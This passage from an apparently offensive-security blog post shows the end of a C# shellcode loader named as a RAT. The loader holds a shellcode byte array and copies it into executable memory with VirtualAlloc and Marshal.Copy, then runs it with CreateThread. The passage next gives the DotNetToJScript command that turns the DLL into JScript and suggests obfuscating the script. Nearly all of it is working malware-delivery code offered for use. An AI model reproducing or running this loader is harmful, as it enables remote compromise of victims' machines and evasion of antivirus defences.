            <span class="m">0xd5</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x83</span><span class="p">,</span><span class="m">0xc4</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x85</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0xb2</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x07</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xc3</span><span class="p">,</span>
            <span class="m">0x85</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0xd2</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0xc3</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc2</span><span class="p">,</span><span class="m">0xf0</span><span class="p">,</span><span class="m">0xb5</span><span class="p">,</span>
            <span class="m">0xa2</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span> <span class="p">};</span>

        <span class="kt">int</span> <span class="n">size</span> <span class="p">=</span> <span class="n">buf</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span>

        <span class="n">IntPtr</span> <span class="n">addr</span> <span class="p">=</span> <span class="nf">VirtualAlloc</span><span class="p">(</span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0x1000</span><span class="p">,</span> <span class="m">0x3000</span><span class="p">,</span> <span class="m">0x40</span><span class="p">);</span>

        <span class="n">Marshal</span><span class="p">.</span><span class="nf">Copy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
        <span class="n">IntPtr</span> <span class="n">hThread</span> <span class="p">=</span> <span class="nf">CreateThread</span><span class="p">(</span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">);</span>
        <span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="m">0xFFFFFFFF</span><span class="p">);</span>

    <span class="p">}</span>

    <span class="k">public</span> <span class="k">void</span> <span class="nf">RunProcess</span><span class="p">(</span><span class="kt">string</span> <span class="n">path</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">Process</span><span class="p">.</span><span class="nf">Start</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p><br />
command to convert the dll to Jscript</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">.</span><span class="n">\DotNetToJscript.exe</span><span class="w"> </span><span class="nx">Rat.dll</span><span class="w"> </span><span class="nt">--lang</span><span class="o">=</span><span class="n">Jscript</span><span class="w"> </span><span class="nt">--ver</span><span class="o">=</span><span class="mi">4</span><span class="w"> </span><span class="nt">-o</span><span class="w"> </span><span class="n">demo.js</span><span class="w"> 
</span></code></pre></div></div>
<p><br />
We can proceed to obsfucated the JScript with opensource javascript obfuscator</p>
:ET